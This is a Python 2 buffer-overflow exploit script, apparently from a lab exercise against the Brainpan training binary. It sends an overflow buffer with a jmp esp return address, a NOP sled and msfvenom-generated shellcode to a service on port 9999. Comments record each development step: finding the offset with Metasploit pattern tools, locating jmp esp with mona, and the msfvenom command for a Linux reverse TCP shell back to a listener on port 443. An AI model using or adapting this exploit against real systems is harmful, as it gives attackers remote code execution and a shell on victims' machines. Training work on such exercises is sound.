import socket import sys from time import sleep # cp 2-crash.py 3-pattern.py # updatedb # locate pattern_create.rb # /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 650 pattern = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av' badchars = ( "" ) shellcode = ( "\xd9\xf7\xd9\x74\x24\xf4\xba\xa9\xde\x67\xfb\x5b\x31\xc9\xb1" "\x12\x31\x53\x17\x83\xc3\x04\x03\xfa\xcd\x85\x0e\xcd\x2a\xbe" "\x12\x7e\x8e\x12\xbf\x82\x99\x74\x8f\xe4\x54\xf6\x63\xb1\xd6" "\xc8\x4e\xc1\x5e\x4e\xa8\xa9\xcc\xa0\x49\x06\x65\xc3\x4d\x59" "\xce\x4a\xac\xe9\x56\x1d\x7e\x5a\x24\x9e\x09\xbd\x87\x21\x5b" "\x55\x76\x0d\x2f\xcd\xee\x7e\xe0\x6f\x86\x09\x1d\x3d\x0b\x83" "\x03\x71\xa0\x5e\x43" ) # cp 3-pattern.py 4-control-eip.py # locate pattern_offset.rb # /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 650 -q 35724134 # [*] Exact match at offset 524 # buffer = 'A' * 600 # buffer = pattern # buffer = 'A' * 524 + 'B' * 4 + 'C' * 122 # 524 + 4 + 122 = 650 # buffer = 'A' * 524 + 'B' * 4 + 'C' * 522 # 122 + 400 = 522 # buffer = 'A' * 524 + 'B' * 4 + badchars # bad characters \x00 # locate nasm_shell.rb # /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb # nasm > jmp esp # 00000000 FFE4 jmp esp # nasm > # !mona modules # !mona find -s "\xff\xe4" -m brainpan.exe # jmp esp at address 311712F3 # buffer = 'A' * 524 + '\xF3\x12\x17\x31' + 'C' * 522 # jmp esp noted in little endian # msfvenom -p linux/x86/shell_reverse_tcp LHOST=172.16.3.47 LPORT=443 -a x86 --platform linux -b '\x00' -f c > shellcode-linux.txt buffer = 'A' * 524 + '\xF3\x12\x17\x31' + '\x90' * 32 + shellcode + 'C' * 395 # 522 - 32 - 95 try: s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.settimeout(2) s.connect(('172.16.3.19',9999)) s.recv(1024) print '[*] Sending buffer.' s.send(buffer + '\r\n') s.close() except: print '[*] Could not connect to target, exiting.' sys.exit()